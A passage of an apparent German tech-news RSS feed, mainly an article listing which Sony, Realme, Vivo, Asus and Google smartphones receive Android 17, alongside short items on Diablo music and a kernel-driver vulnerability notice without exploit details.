<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f0391a7"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/Sony-Xperia-1-VII-review-13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Sony Xperia 1 VII review 13" class="wp-image-2864514" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Sony kommuniziert besonders transparent, welche Smartphones noch Android-Updates erhalten. Daher ist die Liste hier sehr verlässlich.</p>



<p>Diese Geräte bekommen Android 17:</p>



<ul class="wp-block-list">
<li>Xperia 10 VII</li>



<li>Xperia 10 VI</li>



<li><a href="https://www.pcwelt.de/article/3007641/sony-xperia-1-vii-test.html" target="_blank" rel="noreferrer noopener">Xperia 1 VII</a></li>



<li>Xperia 1 VI</li>
</ul>



<p><strong>Kein Update auf Android 17:</strong> Xperia 1 IV, Xperia 1 V, Xperia 5 IV, Xperia 5 V, Xperia 10 V.</p>



<p><strong>Sony Xperia 1 VII im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Sony</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-name="Sony Xperia 1 VII" data-vars-product-id="2815293" data-vars-category="Smartphones" data-vars-manufacturer-id="10057" data-vars-manufacturer="Sony" data-vars-vendor="amazon,Sony" data-vars-po="amazon" data-product="2815293" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Sony" aria-label="Deal anschauen bei Sony für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Realme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f043fd7"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/PXL_20250904_104601692.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Realme GT 7 Dream Editon skärm" class="wp-image-2901166" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Der chinesische Hersteller Realme macht keine allzu genauen Angaben zu kommenden Updates, liefert aber voraussichtlich Android 17 auch an folgende Modelle aus:</p>



<ul class="wp-block-list">
<li>Realme 16 / Pro / Pro+</li>



<li>Realme 15 / 15T / Pro </li>



<li>Realme 14 / 14 T/ Pro / Pro+</li>



<li>Realme 13 / 13T/ Pro / Pro+</li>



<li>P4 / P4 Pro</li>



<li>Realme GT 8 / <a href="https://www.pcwelt.de/article/3056055/realme-gt-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Realme GT 7 / 7T / Pro</li>



<li>Realme GT 6 / 6T / Pro</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Realme GT Neo 5, GT Neo 3.</p>



<p><strong>Realme GT8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>899,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="899,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 899,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=eUdk9xN6rLqRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlt4tJlURbdhUQG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260622&amp;log=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=eUdk9xN6rLqRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlt4tJlURbdhUQG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Vivo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f04c0a4"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Vivo-X300-Pro-hands-on-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Vivo X300 Pro hands on 2" class="wp-image-2941609" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Der chinesische Smartphone-Hersteller Vivo kann eine Vielzahl von Modellen vorweisen, und einige davon bekommen voraussichtlich auch das Update auf Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3145865/vivo-x300-ultra-test.html" target="_blank" rel="noreferrer noopener">Vivo X300</a> / Pro / Ultra / FE</li>



<li>Vivo X200 / X200T Pro / FE </li>



<li>Vivo X100 / Pro</li>



<li>Vivo X Fold 5</li>



<li>Vivo X Fold 3 Pro</li>



<li>Vivo V70 / FE / Elite</li>



<li>Vivo V60 / V60e / V60 Lite </li>



<li>Vivo V50 / V50e / Lite </li>



<li>Vivo V40 / Pro</li>



<li>Vivo T4 / Pro / Ultra / Lite / T4x / T4R</li>



<li>Vivo Y400 / Pro / Pro+</li>



<li>Vivo Y300 GT / Y300t / Y300i</li>



<li>Vivo Y51 Pro</li>



<li>Vivo Y31d 4G</li>



<li>Vivo Y21 (2026)</li>



<li>Vivo Y11 (2026)</li>



<li>Vivo Y05 4G</li>



<li>Vivo Y29s 5G</li>
</ul>



<p><strong>Vivo X300 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

									<div class="price-comparison__record check_on_amazon">
							<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="amazon" loading="lazy">
															</div>
							<div class="price-comparison__price"></div>
							<div>
								<a class="price-comparison__view-button" href="https://www.amazon.de/s?k=Vivo+X300+Pro&amp;tag=pcwelt.de-21&amp;ascsubtag=rss">Bei Amazon ansehen</a>							</div>
						</div>
								
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Asus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f0515df"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Asus-zenphone.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Asus zenphone" class="wp-image-3036644" width="1200" height="544" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p></p>
</figcaption></figure><p class="imageCredit">Asus</p></div>



<p>Asus hat Anfang 2026 angekündigt, vorerst keine neuen Smartphones zu produzieren. Das heißt aber nicht, dass bereits bestehende Modelle keine Updates mehr erhalten.</p>



<p>Folgende Asus-Smartphones erhalten voraussichtlich das Update auf Android 17:</p>



<ul class="wp-block-list">
<li>ROG Phone 9 / <a href="https://www.pcwelt.de/article/2551760/asus-rog-phone-9-pro-test.html" target="_blank" rel="noreferrer noopener">9 Pro</a></li>



<li>ROG Phone 8 / <a href="https://www.pcwelt.de/article/2202783/asus-rog-phone-8-pro-test.html" target="_blank" rel="noreferrer noopener">8 Pro</a></li>



<li>Zenfone 12 Ultra</li>



<li>Zenfone 11 Ultra</li>
</ul>



<p><strong>Eher kein Android 17:</strong> ROG Phone 7, ROG Phone 7 Ultimate, Zenfone 10.</p>



<p><strong>Asus ROG Phone 9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Asus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-name="Asus ROG Phone 9 Pro" data-vars-product-id="2524258" data-vars-category="Smartphones" data-vars-manufacturer-id="11291" data-vars-manufacturer="Asus" data-vars-vendor="billiger,gtin,mpn,Asus" data-vars-po="billiger,gtin,mpn" data-product="2524258" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Asus" aria-label="Deal anschauen bei Asus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Was kann ich tun, wenn mein Gerät kein Android-Update mehr bekommt?</h2>



<p>Wenn Ihr Smartphone keine großen Android-Updates mehr erhält, ist das erst einmal kein Grund zur Panik. Hersteller liefern eine feste Anzahl an Updates aus, die neue Funktionen und Verbesserungen beinhalten. Darüber hinaus gibt es aber auch noch kleinere Updates sowie wichtige Sicherheits-Updates, die unabhängig vom Update auf Android 17 sind.</p>



<p>Sollte sich Ihr Gerät also nicht in der Liste der Modelle befinden, die Android 17 bekommen, prüfen Sie am besten gleich, ob es generell noch Support bekommt, damit Probleme und Sicherheitslücken weiterhin behoben werden. Sollte das nicht der Fall sein, können Sie über die Anschaffung eines <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">neuen Smartphones</a> nachdenken, oder Sie installieren ein <a href="https://www.pcwelt.de/article/2990255/beste-alternativen-zu-google-android.html" target="_blank" rel="noreferrer noopener">alternatives Betriebssystem</a>.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3156260/ihr-android-handy-hat-ein-ablaufdatum-jetzt-herausfinden.html" target="_blank" rel="noreferrer noopener">Ihr Android-Handy hat ein Ablaufdatum: So finden Sie es heraus</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA["We’re always conscious of the past and keeping that legacy," — I went to the Diablo Infernal Symphony and talked to the team behind 30 years of music]]></title>
<description><![CDATA[An exclusive look at the music behind the 30-year legacy of Diablo and the magic of the Infernal Symphony.]]></description>
<link>https://tsecurity.de/de/3614201/windows-tipps/were-always-conscious-of-the-past-and-keeping-that-legacy-i-went-to-the-diablo-infernal-symphony-and-talked-to-the-team-behind-30-years-of-music/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614201/windows-tipps/were-always-conscious-of-the-past-and-keeping-that-legacy-i-went-to-the-diablo-infernal-symphony-and-talked-to-the-team-behind-30-years-of-music/</guid>
<pubDate>Mon, 22 Jun 2026 00:20:58 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An exclusive look at the music behind the 30-year legacy of Diablo and the magic of the Infernal Symphony.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12784 | IM-Magic Partition Resizer up to 7.9.0 Kernel Driver MDA_NTDRV.sys access control (EUVD-2026-38149)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in IM-Magic Partition Resizer up to 7.9.0. This affects an unknown function in the library MDA_NTDRV.sys of the component Kernel Driver. This manipulation causes improper access controls.

This vulnerability appears as CVE-2026-12784. The attac...]]></description>
<link>https://tsecurity.de/de/3613503/sicherheitsluecken/cve-2026-12784-im-magic-partition-resizer-up-to-790-kernel-driver-mdantdrvsys-access-control-euvd-2026-38149/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613503/sicherheitsluecken/cve-2026-12784-im-magic-partition-resizer-up-to-790-kernel-driver-mdantdrvsys-access-control-euvd-2026-38149/</guid>
<pubDate>Sun, 21 Jun 2026 13:09:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/im-magic:partition_resizer">IM-Magic Partition Resizer up to 7.9.0</a>. This affects an unknown function in the library <em>MDA_NTDRV.sys</em> of the component <em>Kernel Driver</em>. This manipulation causes improper access controls.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-12784">CVE-2026-12784</a>. The attack requires local access. In addition, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17: Diese Smartphones bekommen das Update]]></title>
<description><![CDATA[Android 17, das neueste Update von Googles Betriebssystem, ist endlich erschienen und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.



Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überh...]]></description>
<link>https://tsecurity.de/de/3613241/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613241/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</guid>
<pubDate>Sun, 21 Jun 2026 09:17:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a>, das neueste Update von Googles Betriebssystem, <a href="https://www.pcwelt.de/article/3167761/android-17-ist-endlich-da-so-bekommen-sie-das-update.html" target="_blank" rel="noreferrer noopener">ist endlich erschienen</a> und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.</p>



<p>Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überhaupt erhalten! Welche Smartphones immer noch aktualisiert und auch mit <strong>Android 17 </strong>versorgt werden, verrät unsere Übersicht. Diese ist nach Marken sortiert und enthält auch Links zu unseren Testberichten der jeweiligen Modelle.</p>



<p>Da die Hersteller aktueller Smartphones <a href="https://www.pcwelt.de/article/2808830/ab-20-juni-2025-laengerer-support-fuer-smartphones.html" target="_blank" rel="noreferrer noopener">seit 2025</a> dazu verpflichtet sind, mindestens <strong>fünf Jahre </strong>lang Updates für ihre Geräte zu liefern, fällt die Liste recht ähnlich zu der von <a href="https://www.pcwelt.de/article/2814156/android-16-diese-smartphones-bekommen-das-update.html" target="_blank" rel="noreferrer noopener">Android 16</a> aus. Einige Geräte fliegen in diesem Jahr aber dennoch aus dem Update-Zyklus heraus (siehe <a href="https://www.pcwelt.de/article/3129020/android-17-diese-smartphones-bekommen-das-update-nicht-mehr.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update nicht mehr</a>).</p>



<p><em><strong>Hinweis:</strong> Einige Hersteller treffen klare Aussagen bezüglich der geplanten Update-Zeiträume ihrer Geräte. Andere halten sich nur grob an die EU-Richtlinie. Genießen Sie die Angaben also mit Vorsicht, denn spontan kann sich immer etwas ändern.</em></p>



<h2 class="wp-block-heading">Google</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9b8d88"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-10a-review-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10a review 3" class="wp-image-3078312" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundy</p></div>



<p>Google liefert bekanntlich als erstes Update auf Android 17, da es keine weiteren Anpassungen für die hauseigenen Pixel-Smartphones vornehmen muss. Der Rollout ist hier bereits gestartet. Durch die erweiterte Update-Garantie von Google fallen im Vergleich zu Android 16 auch keine Geräte raus.</p>



<p>Diese Google-Smartphones werden das Update auf Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3065303/google-pixel-10a-vorgestellt-preis-erscheinungsdatum-farben-specs.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a></li>



<li><a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel 10</a></li>



<li><a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a></li>



<li>Pixel 10 Pro XL</li>



<li><a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2687125/google-pixel-9a-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 9a</a></li>



<li><a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a></li>



<li>Pixel 9 Pro</li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro XL</a></li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2111264/google-pixel-8-test.html" target="_blank" rel="noreferrer noopener">Pixel 8</a></li>



<li><a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2779688/google-pixel-8a-test.html" target="_blank" rel="noreferrer noopener">Pixel 8a</a></li>



<li><a href="https://www.pcwelt.de/article/1812910/google-pixel-7-test-smartphone.html" target="_blank" rel="noreferrer noopener">Pixel 7</a></li>



<li><a href="https://www.pcwelt.de/article/1352376/google-pixel-7-pro-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 7 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1815523/google-pixel-7a-test.html" target="_blank" rel="noreferrer noopener">Pixel 7a</a></li>



<li><a href="https://www.pcwelt.de/article/1200502/google-pixel-6-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 6</a></li>



<li><a href="https://www.pcwelt.de/article/1200514/google-pixel-6-pro-im-test-vertrautes-android-erlebnis-in-neuem-gewand.html" target="_blank" rel="noreferrer noopener">Pixel 6 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1206583/test-google-pixel-6a.html" target="_blank" rel="noreferrer noopener">Pixel 6a</a></li>
</ul>



<p><strong>Google Pixel 10 Pro XL im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>939,00 €</span>						</div>
						<div>
